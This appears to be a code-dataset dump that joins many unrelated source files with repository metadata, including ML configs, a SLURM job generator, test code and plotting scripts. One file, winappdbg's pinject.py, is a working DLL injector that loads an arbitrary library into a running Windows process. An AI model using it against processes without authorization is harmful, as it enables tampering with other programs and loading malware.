        self.done_image_paths = set(util_io.get_all_image_paths(finished_image_txt_path))
      except AssertionError:
        pass
    self.sketch_folder = sketch_folder
    # Keep only images whose basename matches an existing sketch.
    sketches = set([util_misc.get_no_ext_base(p) for p in util_io.get_all_image_paths(sketch_folder)])
    self.image_paths = [p for p in self.image_paths if util_misc.get_no_ext_base(p) in sketches]
    pass
  def get_image_and_id(self):
    """Returns an image encoded in base64."""
    # Skip forward past everything already marked done.
    while self.index < len(self.image_paths) and self.image_paths[self.index] in self.done_image_paths:
      self.index += 1
    if self.index == len(self.image_paths):
      return None, None, None
    image = interface_utils.get_image_encoding(self.image_paths[self.index])
    image_id = os.path.basename(self.image_paths[self.index])
    sketch_image_path = self.get_current_sketch_path()
    sketch = interface_utils.get_image_encoding(sketch_image_path)
    self.sketch_paths[self.index] = sketch_image_path
    return image, sketch, image_id
  def mark_current_as_done(self, is_skip):
    """Persist the current image as handled and advance to the next one.

    Always appends to the done-list file; additionally records the
    (colored, sketch) pair unless `is_skip` is true.
    """
    with open(self.done_image_txt_path, 'a') as f:
      f.write(self.image_paths[self.index] + '\n')
    if not is_skip:
      with open(self.colored_sketch_pair_txt_path, 'a') as f:
        f.write(self.image_paths[self.index]+'\t' + self.sketch_paths[self.index] + '\n')
    self.done_image_paths.add(self.image_paths[self.index])
    self.index += 1
  def get_current_sketch_path(self):
    # Sketch path derived from the currently-served image's basename.
    return self.get_sketch_path_for_image_name(self.image_paths[self.index])
  def get_sketch_path_for_image_name(self, image_basename):
    # Sketches live in sketch_folder as <basename-without-extension>.jpg.
    return os.path.join(self.sketch_folder, util_misc.get_no_ext_base(image_basename) + '.jpg')
  def set_current_sketch_path(self, new_path):
    # Override the sketch paired with the current image.
    self.sketch_paths[self.index] = new_path
"jerrylijiaming@gmail.com"
] | jerrylijiaming@gmail.com |
7908f51adf44b6200b10a9cc53f37fa511f66531 | f6439b5ed1614fd8db05fa963b47765eae225eb5 | /chrome/browser/extensions/api/push_messaging/DEPS | 8c7d15a911d33d64d98ca56406d3c0a18c5d4e0f | [
"BSD-3-Clause"
] | permissive | aranajhonny/chromium | b8a3c975211e1ea2f15b83647b4d8eb45252f1be | caf5bcb822f79b8997720e589334266551a50a13 | refs/heads/master | 2021-05-11T00:20:34.020261 | 2018-01-21T03:31:45 | 2018-01-21T03:31:45 | 118,301,142 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | include_rules = [
"+components/invalidation",
"+google/cacheinvalidation/types.pb.h",
"+sync/internal_api/public/base/invalidation.h",
"+sync/internal_api/public/base/invalidation_util.h",
]
| [
"jhonnyjosearana@gmail.com"
] | jhonnyjosearana@gmail.com | |
68095f0f7e56c2373879c98c67cf6bbf375b3bf3 | 40dd8330e5f78c4348bbddc2c5acfd59d793dd51 | /projects/medical/2d_image/dermoscopy/isic2017_task1/configs/fcn-unet-s5-d16_unet_1xb16-0.0001-20k_isic2017-task1-512x512.py | 58d0a125d33a1948802b1bbc104095f9fdd28f54 | [
"Apache-2.0"
] | permissive | open-mmlab/mmsegmentation | 0d12092312e2c465ede1fd7dd9847b6f2b37049c | 30a3f94f3e2916e27fa38c67cc3b8c69c1893fe8 | refs/heads/main | 2023-09-04T10:54:52.299711 | 2023-07-24T07:28:21 | 2023-07-24T07:28:21 | 272,133,018 | 6,534 | 2,375 | Apache-2.0 | 2023-09-14T01:22:32 | 2020-06-14T04:32:33 | Python | UTF-8 | Python | false | false | 606 | py | _base_ = [
    'mmseg::_base_/models/fcn_unet_s5-d16.py', './isic2017-task1_512x512.py',
    'mmseg::_base_/default_runtime.py',
    'mmseg::_base_/schedules/schedule_20k.py'
]
# Register the project-local dataset module with the registry.
custom_imports = dict(imports='datasets.isic2017-task1_dataset')
img_scale = (512, 512)
data_preprocessor = dict(size=img_scale)
optimizer = dict(lr=0.0001)
optim_wrapper = dict(optimizer=optimizer)
model = dict(
    data_preprocessor=data_preprocessor,
    # Binary segmentation: lesion vs background.
    decode_head=dict(num_classes=2),
    auxiliary_head=None,
    # Whole-image inference; _delete_=True replaces (rather than merges
    # with) the test_cfg inherited from the base config.
    test_cfg=dict(mode='whole', _delete_=True))
# Disable visualization backends for this config.
vis_backends = None
visualizer = dict(vis_backends=vis_backends)
| [
"noreply@github.com"
] | open-mmlab.noreply@github.com |
1cc43dc39860b3db828c76db2404cf44159f7da6 | 08ace4e8d7b2fcfa4ff4983e643873fd9c01f6de | /tools/pinject.py | ef71dd321b6524c40bc31b51194ec46cd83e3890 | [] | no_license | 0x90/winappdbg | 87d2e769707ec4ca482af0c946e02f77976314a2 | 5acffe77379836622042385460411ef4dc751d46 | refs/heads/master | 2020-09-26T08:19:10.600353 | 2019-12-06T00:42:52 | 2019-12-06T00:42:52 | 226,215,022 | 6 | 1 | null | 2019-12-06T00:41:16 | 2019-12-06T00:41:15 | null | UTF-8 | Python | false | false | 3,301 | py | #!/bin/env python
# -*- coding: utf-8 -*-
# Acknowledgements:
# Nicolas Economou, for his ptool suite on which this tool is inspired.
# http://tinyurl.com/nicolaseconomou
# Process DLL injector
# Copyright (c) 2009-2018, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
from winappdbg import Process, System, HexInput
def main():
    """Parse argv, locate the target process and inject the DLL into it."""
    print "Process DLL injector"
    print "by Mario Vilas (mvilas at gmail.com)"
    print
    # Exactly two arguments are required: target (pid or exe name) and DLL.
    if len(sys.argv) != 3:
        script = os.path.basename(sys.argv[0])
        print "Injects a DLL into a running process."
        print "    %s <pid> <library.dll>" % script
        print "    %s <process.exe> <library.dll>" % script
        return
    System.request_debug_privileges()
    try:
        pid = HexInput.integer(sys.argv[1])
    except Exception:
        # Not a number: treat the first argument as a process filename
        # and resolve it to a single PID, bailing out on zero or many matches.
        s = System()
        s.scan_processes()
        pl = s.find_processes_by_filename(sys.argv[1])
        if not pl:
            print "Process not found: %s" % sys.argv[1]
            return
        if len(pl) > 1:
            print "Multiple processes found for %s" % sys.argv[1]
            for p,n in pl:
                print "\t%12d: %s" % (p,n)
            return
        pid = pl[0][0].get_pid()
        print "Using PID %d (0x%x)" % (pid, pid)
    dll = sys.argv[2]
    print "Using DLL %s" % dll
    p = Process(pid)
    b = p.get_bits()
    # Injection only works between processes of the same bitness.
    if b != System.bits:
        print (
            "Cannot inject into a %d bit process from a %d bit Python VM!"
            % (b, System.bits)
        )
        return
    p.scan_modules()
    p.inject_dll(dll)
if __name__ == '__main__':
    # Optionally JIT-compile main() with psyco (Python 2 only); fall back
    # silently to plain execution when psyco is not installed.
    try:
        import psyco
        psyco.bind(main)
    except ImportError:
        pass
    main()
| [
"mvilas@gmail.com"
] | mvilas@gmail.com |
b634f92f48233fa93f99b45521e9ff384f0ae8cf | abaa004b41f63aa489be12a6e4be8f92ef2ef6d3 | /csvfetch/csvfetch/asgi.py | 10359ee6cee1be3538ccdfe026ad2c360aa606c2 | [] | no_license | vshaladhav97/django_practise_projects | 30dcc8dd909626c1d624d9c5895fc90ad55c79d0 | 83455c50e2ee910f03db47fbe1420d1cbd7eb292 | refs/heads/master | 2023-03-28T14:08:08.244694 | 2021-03-26T03:56:56 | 2021-03-26T03:56:56 | 351,655,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | """
ASGI config for csvfetch project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at the project settings before the application is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'csvfetch.settings')
application = get_asgi_application()
| [
"adhavv0@gmail.com"
] | adhavv0@gmail.com |
db4906b126e1ee3ff257b3bb20c776ab64d9a31b | 90ec9a009d84dd7eebbd93de4f4b9de553326a39 | /app/config/enums.py | a558f22c18fe955f066b40058f21e00a46fa4fc0 | [] | no_license | alexiuasse/NipponArDjango | 18a86bb108b9d72b36c8adf7c4344398cc4ca6b2 | ddc541a8d7e4428bde63c56f44354d6f82e0f40d | refs/heads/master | 2023-08-03T12:16:56.431870 | 2021-07-15T23:43:33 | 2021-07-15T23:43:33 | 278,093,323 | 0 | 0 | null | 2021-09-22T20:04:15 | 2020-07-08T13:13:22 | CSS | UTF-8 | Python | false | false | 391 | py | # Created by Alex Matos Iuasse.
# Copyright (c) 2020. All rights reserved.
# Last modified 10/08/2020 10:14.
from enum import Enum
class ContextualEnum(Enum):
    """Bootstrap contextual CSS classes keyed by (Portuguese) color names."""
    VERDE = "success"
    AZUL = "primary"
    CIANO = "info"
    AMARELO = "warning"
    VERMELHO = "danger"
    CINZA = "default"

    @classmethod
    def choices(cls):
        """Return (value, name) pairs, e.g. for a Django field ``choices``."""
        pairs = []
        for member in cls:
            pairs.append((member.value, member.name))
        return pairs
| [
"alexiuasse@gmail.com"
] | alexiuasse@gmail.com |
8c91a1c95584126d62eb15a000e7d8c552c05140 | 60aee65d7d40f2886a4c15e08e50f145c809aff6 | /experiment/Keras Machine Learning Model/function/imgCrop.py | 419986e7616c7aa5477d0e5bd51844dd9b815006 | [] | no_license | tshahria/DreamCatcher | 2fdabd90add46eb86a20fe1aa1b5bb4d4a58ddb1 | 3880b120f8ed857462d565fbf48d320076bff73a | refs/heads/master | 2021-05-06T10:19:18.634656 | 2017-12-08T20:31:44 | 2017-12-08T20:31:44 | 114,164,133 | 0 | 1 | null | 2017-12-13T20:09:44 | 2017-12-13T20:09:43 | null | UTF-8 | Python | false | false | 2,849 | py | import sys
from PIL import Image, ImageDraw
try:
import cv2 as cv
except ImportError:
print('Could not import cv, trying opencv')
import opencv.cv as cv
def main():
    """Resize a source photo, detect faces, and crop a 1000x200 banner
    centred vertically on the band of detected faces.

    Returns a process exit code: 0 on success, 1 when the faces span more
    vertical space than the target banner height.
    """
    source_image = Image.open('function/ppl.jpg')
    source_width, source_height = source_image.size
    print('Image is {}x{}'.format(source_width, source_height))

    target_width = 1000
    target_height = 200

    # Make image a reasonable size to work with. Using the source_height will
    # make sure it's just resized to the target_width
    source_image.thumbnail((target_width, source_height), Image.ANTIALIAS)

    # Find the faces and show us where they are
    faces = faces_from_pil_image(source_image)
    faces_found_image = draw_faces(source_image, faces)
    faces_found_image.show()

    # Get details about where the faces are so we can crop
    top_of_faces = top_face_top(faces)
    bottom_of_faces = bottom_face_bottom(faces)
    all_faces_height = bottom_of_faces - top_of_faces
    print('Faces are {} pixels high'.format(all_faces_height))

    # BUGFIX: compare against the crop's *height*, not its width. The original
    # test (`>= target_width`, i.e. 1000) let face bands taller than the
    # 200px banner fall through to the crop branch.
    if all_faces_height >= target_height:
        print('Faces take up more than the final image, you need better logic')
        exit_code = 1
    else:
        # Centre the band of faces vertically inside the target crop.
        face_buffer = 0.5 * (target_height - all_faces_height)
        top_of_crop = int(top_of_faces - face_buffer)
        coords = (0, top_of_crop, target_width, top_of_crop + target_height)
        print('Cropping to', coords)
        final_image = source_image.crop(coords)
        final_image.show()
        exit_code = 0
    return exit_code
def faces_from_pil_image(pil_image):
    "Return a list of (x, y, w, h) tuples for faces detected in the PIL image"
    # NOTE: this uses the legacy OpenCV 1.x `cv` API (CreateMemStorage,
    # HaarDetectObjects, ...); it will not run against modern cv2 builds.
    storage = cv.CreateMemStorage(0)
    # Haar cascade file is expected in the current working directory.
    facial_features = cv.Load('haarcascade_frontalface_alt.xml', storage=storage)
    cv_im = cv.CreateImageHeader(pil_image.size, cv.IPL_DEPTH_8U, 3)
    # NOTE(review): PIL's Image.tostring() was removed in modern Pillow
    # (replaced by tobytes()) — confirm the pinned PIL version if reviving.
    cv.SetData(cv_im, pil_image.tostring())
    faces = cv.HaarDetectObjects(cv_im, facial_features, storage)
    # faces includes a `neighbors` field that we aren't going to use here
    return [f[0] for f in faces]
def top_face_top(faces):
    """Return the y coordinate of the highest face's top edge.

    The image origin is the top-left corner, so the highest face is the
    one with the smallest y value.
    """
    return min(face[1] for face in faces)
def bottom_face_bottom(faces):
    """Return the y coordinate of the lowest face's bottom edge (y + h).

    The image origin is the top-left corner, so the lowest point is the
    largest y + height over all detected faces.
    """
    return max(face[1] + face[3] for face in faces)
def draw_faces(image_, faces):
    """Return a copy of the image with a rectangle drawn around each face."""
    annotated = image_.copy()
    pen = ImageDraw.Draw(annotated)
    for x, y, w, h in faces:
        pen.rectangle((x, y, x + w, y + h))
    return annotated
if __name__ == '__main__':
    # Propagate main()'s return value as the process exit status.
    sys.exit(main())
"jeffreykam0415@gmail.com"
] | jeffreykam0415@gmail.com |
dfb78191a7e2e45e05ba8a63e31ddffa103108f6 | 504efba4ab5ba1721ab3388144b16fa5f24833e7 | /07_Chroma_Scan_SC_NoRF/01_05/Make_SLURM_submission_script.py | 884a2e4ed4160053f6c9bacba40ba1044ad8a6a7 | [
"MIT"
] | permissive | HaroonRafique/PS_Transfer | b568fe41c98357877c3bc63b2ca89f8724439da0 | 59ed8a0978ba4699f34c9f7a2500e0026759a2b6 | refs/heads/master | 2023-05-25T21:13:36.586605 | 2020-07-10T07:41:40 | 2020-07-10T07:41:40 | 213,405,455 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,317 | py | #!/usr/bin/env python
# Python script to create a SLURM submission script for PyORBIT
# 21 March 2019 Haroon Rafique CERN BE-ABP-HSI
import os
#-----------------------------------------------------------------------
# SETTINGS
#-----------------------------------------------------------------------
script_name = "SLURM_submission_script.sh"
# Switches
hyperthreading = False # Enable hyperthreading
exclusive = True # Exclusive (see SLURM documentation)
autotime = True # 2 days for short queues, 2 weeks for long queues
autotask = True # Automatically set nodes to maximum tasks
clean_all = True # Clean simulation folder before running (False when resuming pickle checkpoint)
# Must be chosen
# ~ queue = 'inf-long', 'inf-short', 'batch-long', 'batch-short'
queue = 'batch-short'
n_nodes = 2
jobname = '05_01_05'
path_to_simulation = os.path.dirname(os.path.realpath(__file__)) # This directory
# Optional - have to use with correct switches
manual_time = '504:00:00' # manually set using format 'hours:minutes:seconds'
manual_tasks = 40 # manually change ntasks
# Defaults - can be changed
output_file_name = 'slurm.%N.%j.out'
error_file_name = 'slurm.%N.%j.err'
root_dir = '/hpcscratch/user/harafiqu'
simulation_file = 'pyOrbit.py'
#-----------------------------------------------------------------------
# AUTOMATICALLY FORMAT SCRIPT
#-----------------------------------------------------------------------
n_tasks = 0
if autotask:
if hyperthreading:
if 'batch' in queue: n_tasks = 32
elif 'inf' in queue: n_tasks = 40
else:
print 'queue not recognised'
exit(0)
else:
if 'batch' in queue: n_tasks = 16
elif 'inf' in queue: n_tasks = 20
else:
print 'queue not recognised'
exit(0)
else: n_tasks = manual_tasks
time = '48:00:00'
if autotime:
if queue == 'batch-short': time = '48:00:00'
elif queue == 'inf-short': time = '120:00:00'
elif queue == 'inf-long' or 'batch-long': time = '504:00:00'
else:
print 'queue not recognised'
exit(0)
else: time = manual_time
#-----------------------------------------------------------------------
# WRITE FILE
#-----------------------------------------------------------------------
if os.path.exists(script_name):
print 'SLURM submission script ' + script_name + ' already exists. Deleting'
os.remove(script_name)
print "Creating ", script_name
f= open(script_name,"w")
f.write('#!/bin/bash')
f.write('\n#SBATCH --job-name=' + str(jobname))
f.write('\n#SBATCH --output=' + str(output_file_name))
f.write('\n#SBATCH --error=' + str(error_file_name))
f.write('\n#SBATCH --nodes=' + str(n_nodes))
f.write('\n#SBATCH --ntasks-per-node=' + str(n_tasks))
f.write('\n#SBATCH --partition=' + str(queue))
f.write('\n#SBATCH --time=' + str(time))
f.write('\n#SBATCH --mem-per-cpu=3200M')
if (exclusive): f.write('\n#SBATCH --exclusive')
if not hyperthreading: f.write('\n#SBATCH --hint=nomultithread')
f.write('\n')
f.write('\nBATCH_ROOT_DIR=' + str(root_dir))
f.write('\nRUN_DIR=' + str(path_to_simulation))
f.write('\nOrigIwd=$(pwd)')
f.write('\n')
f.write('\n# Make an output folder in the root directory to hold SLURM info file')
f.write('\ncd ${BATCH_ROOT_DIR}')
f.write('\noutput_dir="output"')
f.write('\nmkdir -p $output_dir')
f.write('\n')
f.write('\n# Fill the SLURM info file')
f.write('\nsimulation_info_file="${BATCH_ROOT_DIR}/${output_dir}/simulation_info_${SLURM_JOB_ID}.${SLURM_NODEID}.${SLURM_PROCID}.txt"')
f.write('\necho "PyOrbit path: `readlink -f ${ORBIT_ROOT}`" >> ${simulation_info_file}')
f.write('\necho "Run path: `readlink -f ${RUN_DIR}`" >> ${simulation_info_file}')
f.write('\necho "Submit host: `readlink -f ${SLURM_SUBMIT_HOST}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job name: `readlink -f ${SLURM_JOB_NAME}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job ID: `readlink -f ${SLURM_JOB_ID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Nodes allocated: `readlink -f ${SLURM_JOB_NUM_NODES}`" >> ${simulation_info_file}')
f.write('\necho "SLURM CPUS per Node: `readlink -f ${SLURM_CPUS_ON_NODE}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Node ID: `readlink -f ${SLURM_NODEID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM total cores for job: `readlink -f ${SLURM_NTASKS}`" >> ${simulation_info_file}')
f.write('\necho "SLURM process ID: `readlink -f ${SLURM_PROCID}`" >> ${simulation_info_file}')
f.write('\necho "****************************************" >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Enter job directory, clean it, and setup environment -> SLURM info file')
f.write('\ncd ${RUN_DIR}')
if clean_all:f.write('\n./clean_all.sh')
f.write('\n. setup_environment.sh >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Load correct MPI')
f.write('\nmodule load mpi/mvapich2/2.3')
f.write('\n')
f.write('\ntstart=$(date +%s)')
f.write('\n')
f.write('\n# Run the job')
if hyperthreading:f.write('\nsrun ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
else:f.write('\nsrun --hint=nomultithread ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
f.write('\n')
f.write('\ntend=$(date +%s)')
f.write('\ndt=$(($tend - $tstart))')
f.write('\necho "total simulation time (s): " $dt >> ${simulation_info_file}')
f.close()
print 'SLURM submission script creation finished'
| [
"haroon.rafique@protonmail.com"
] | haroon.rafique@protonmail.com |
470279f1566f761e2fe269c7fa4a6b4f68c48f35 | 060ce17de7b5cdbd5f7064d1fceb4ded17a23649 | /fn_aws_utilities/tests/test_funct_fn_get_step_function_execution.py | 69e85aa6d5a7b8b7d1d865e924e6b6f2ada73d71 | [
"MIT"
] | permissive | ibmresilient/resilient-community-apps | 74bbd770062a22801cef585d4415c29cbb4d34e2 | 6878c78b94eeca407998a41ce8db2cc00f2b6758 | refs/heads/main | 2023-06-26T20:47:15.059297 | 2023-06-23T16:33:58 | 2023-06-23T16:33:58 | 101,410,006 | 81 | 107 | MIT | 2023-03-29T20:40:31 | 2017-08-25T14:07:33 | Python | UTF-8 | Python | false | false | 3,073 | py | # -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
import fn_aws_utilities
from mock import patch
import pytest
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from .mock_artifacts import mock_constants, mocked_aws_step_function
PACKAGE_NAME = "fn_aws_utilities"
FUNCTION_NAME = "fn_get_step_function_execution"
# Read the default configuration-data section from the package
config_data = get_config_data(PACKAGE_NAME)
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def call_fn_get_step_function_execution_function(circuits, function_params, timeout=5):
    """Fire the function's test event on the circuits app and wait for either
    an exception event or the function's result event.

    Returns the FunctionResult value on success; re-raises any exception the
    FunctionComponent raised.
    """
    # Create the submitTestFunction event
    evt = SubmitTestFunction("fn_get_step_function_execution", function_params)
    # Fire a message to the function
    circuits.manager.fire(evt)
    # circuits will fire an "exception" event if an exception is raised in the FunctionComponent
    # return this exception if it is raised
    exception_event = circuits.watcher.wait("exception", parent=None, timeout=timeout)
    if exception_event is not False:
        exception = exception_event.args[1]
        raise exception
    # else return the FunctionComponent's results
    else:
        event = circuits.watcher.wait("fn_get_step_function_execution_result", parent=evt, timeout=timeout)
        assert event
        assert isinstance(event.kwargs["result"], FunctionResult)
        pytest.wait_for(event, "complete", True)
        return event.kwargs["result"].value
class TestFnGetStepFunctionExecution:
    """ Tests for the fn_get_step_function_execution function"""
    def test_function_definition(self):
        """ Test that the package provides customization_data that defines the function """
        func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
        assert func is not None
    # Case 1: execution "0000" — mocked run has both a start and a stop date.
    mock_inputs_1 = {
        "execution_arn": "0000"
    }
    expected_results_1 = {
        "startDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S"),
        "stopDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S")
    }
    # Case 2: execution "1111" — mocked run is still in progress (no stop date).
    mock_inputs_2 = {
        "execution_arn": "1111"
    }
    expected_results_2 = {
        "startDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S"),
        "stopDate": None
    }
    # The AWS client is patched out so no real Step Functions call is made.
    @patch("fn_aws_utilities.components.fn_get_step_function_execution.AwsStepFunction", side_effect=mocked_aws_step_function)
    @pytest.mark.parametrize("mock_inputs, expected_results", [
        (mock_inputs_1, expected_results_1),
        (mock_inputs_2, expected_results_2)
    ])
    def test_success(self, mock_aws_step_function, circuits_app, mock_inputs, expected_results):
        """ Test calling with sample values for the parameters """
        results = call_fn_get_step_function_execution_function(circuits_app, mock_inputs)
        assert(expected_results == results)
| [
"travis@example.org"
] | travis@example.org |
08a1e71a298632f21bbaf6a642b26963207b28c4 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2234/60636/265682.py | 7f5892bbcb14ddbeb52302932a7f2c3a611488fa | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,292 | py | from itertools import combinations
# Competition-style script: reads a directed graph and a set of start nodes
# from stdin, then prints groups of nodes reachable from each start.
n=int(input())
p=int(input())
# jiandie[i] holds the value attached to start node i (0 for non-starts).
jiandie=[]
starts=[]
for i in range(n):
    jiandie.append(0)
for i in range(p):
    x=input().split(" ")
    starts.append(int(x[0])-1)
    jiandie[int(x[0])-1]=int(x[1])
# Read r directed edges into an n x n adjacency matrix of "0"/"1" strings.
r=int(input())
sources=[]
for i in range(n):
    source=[]
    for j in range(n):
        source.append("0")
    sources.append(source)
for i in range(r):
    x=input().split(" ")
    sources[int(x[0])-1][int(x[1])-1]="1"
YES=[]
NO=[]
res=[]
# Breadth-first style expansion: for each start node collect every node
# reachable from it (ans); target/x act as the frontier.
for i in range(len(starts)):
    target=[]
    target.append(starts[i])
    ans=[]
    while(len(target)):
        x=target.copy()
        for a in target:
            x.pop(x.index(a))
            if not a in ans:
                ans.append(a)
            for j in range(len(sources[a])):
                if sources[a][j]=="1":
                    if not j in ans and not j in x:
                        x.append(j)
        target=x
    res.append(ans)
# Merge the per-start reachable sets.
# NOTE(review): `j` below iterates *lists* from `targets`, yet is compared
# against node ids later — this merge step looks suspect; verify intent.
targets=[]
targets.append(res[0])
res.pop(0)
for i in res:
    alls=[]
    for j in targets:
        if not j in alls:
            alls.append(j)
    for j in i:
        if not j in alls:
            targets.append(j)
print(targets)
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
cdfe3f9d3039f42e476a4efec7a3cb47ff8b2c02 | b00840e56173dc2a196442bd354b9e3cc13b17df | /code_fargo/tutorial/compareMigrationRates.py | 55fbadae5550691b2f011813952e4c8a78bbc715 | [] | no_license | Sportsfan77777/vortex | 56c28fb760f6c98de4a7c8fdcf1168d78b4e57af | 780ec14937d1b79e91a367d58f75adc905b8eef2 | refs/heads/master | 2023-08-31T02:50:09.454230 | 2023-08-24T10:55:05 | 2023-08-24T10:55:05 | 41,785,163 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,181 | py | """
plots torque over time
*** uses a smoothing function ***
"""
import sys
import os
import subprocess
import pickle
import numpy as np
from matplotlib import pyplot as plot
from matplotlib import rcParams as rc
from scipy import signal as sig
from scipy.ndimage import filters as ff
import util
## Choose directories ##
directories = ["earth1", "earth4", "earth16", "jupiter2", "jupiter1", "saturn1", "saturn-half"]
###############################################################################
## Set file names ##
orbit_fn = "orbit0.dat"
def smooth(array, kernel_size):
    """Gaussian smoothing filter.

    Wraps scipy's gaussian_filter with mode='nearest' so edges are padded by
    replicating the boundary samples. (Was a lambda assignment; PEP 8 E731.)
    """
    return ff.gaussian_filter(array, kernel_size, mode = 'nearest')
# Plot Parameters
kernel_size = 20
colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',
'#9467bd', '#8c564b', '#e377c2', '#7f7f7f',
'#bcbd22', '#17becf']
fontsize = 14
linewidth = 3
start_time = 10 # start time
end_time = 95 # end time
def add_track(directory, index):
    """Load a sibling run's orbit0.dat and plot its migration rate curve.

    directory: run folder name (used both as path and legend label).
    index: selects the line color from the module-level `colors` list.
    """
    fn = "../%s/%s" % (directory, orbit_fn)
    data = np.loadtxt(fn)
    times = data[:, 0] / (2 * np.pi) # Convert to orbital times
    sm_axes = data[:, 2] # Planet Semi-Major Axis
    dt = times[1] - times[0] # Note: output is constant
    # Smooth a(t) first so the finite difference below is not noise-dominated.
    smoothed_sm_axes = smooth(sm_axes, kernel_size)
    migration_rates = -(np.diff(smoothed_sm_axes) / dt) / smoothed_sm_axes[:-1] # -(da/dt) / a
    # Restrict the plotted window to [start_time, end_time] orbits.
    start = np.searchsorted(times, start_time)
    end = np.searchsorted(times, end_time)
    xs = times[start : end]; ys = migration_rates[start : end]
    plot.plot(xs, ys, linewidth = linewidth, label = directory, c = colors[index])
def make_plot():
    """Plot migration rates for every run in `directories`, save, and show."""
    # Curves
    for i, directory in enumerate(directories):
        add_track(directory, i)
    # Annotate
    plot.title("Migration Rates", fontsize = fontsize + 2)
    plot.xlabel(r"$t$", fontsize = fontsize)
    plot.ylabel(r"$-\frac{1}{a} \frac{da}{dt}$", fontsize = fontsize)
    plot.legend(loc = "upper right")
    # Limits
    plot.xlim(0, 1.5 * end_time)
    #plot.ylim(min_y, max_y)
    # Save and Close
    plot.savefig("migrationRateComparison.png", bbox_inches = 'tight')
    plot.show()
    plot.cla()
### PLOTTING ###
make_plot()
| [
"mhammer44444@gmail.com"
] | mhammer44444@gmail.com |
c83f3d3773151f469f78e72a467dd0805bf68c6e | eb40da8906c1a03a22c4c6e2a9eb09ea8f87953c | /api/areas/areas.py | daebbec8e355ce5917c4d364ebeaa1884fad0515 | [
"MIT"
] | permissive | ufosoftwarellc/cannlytics | 677d149f64ee165c2e2adc0f3f39e618c3b2cc10 | 236bd597e30530666400fef6dceaae6de6aa587b | refs/heads/main | 2023-06-02T02:09:01.425087 | 2021-06-19T06:41:12 | 2021-06-19T06:41:12 | 377,613,147 | 0 | 0 | MIT | 2021-06-16T20:00:49 | 2021-06-16T20:00:48 | null | UTF-8 | Python | false | false | 3,025 | py | """
Areas Endpoints | Cannlytics API
Created: 5/8/2021
Updated: 5/8/2021
API endpoints to interface with areas.
"""
# External imports
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
# Internal imports
from api.auth import auth
@api_view(['GET', 'POST', 'DELETE'])
def areas(request, format=None):
    """Get, create/update, or archive areas / locations.

    GET returns area records (currently placeholder data), POST creates or
    updates an area, DELETE archives one. All branches are scaffolding with
    TODOs for the eventual Firestore/Metrc integration.
    """
    # Authenticate the user.
    # NOTE(review): `uid` is currently unused by the branches below.
    claims = auth.verify_session(request)
    uid = claims['uid']
    if request.method == 'GET':
        # Placeholders for the eventual Firestore collection lookup.
        org_id = ''
        ref = '/organizations/%s/areas'
        # TODO: If no organization is specified, get the user's
        # organizations and get all areas for all licenses.
        # IF the organization is specified, get all areas for all
        # licenses of the organization.
        # If the organization and license is specified, get all areas
        # for the given organization's license.
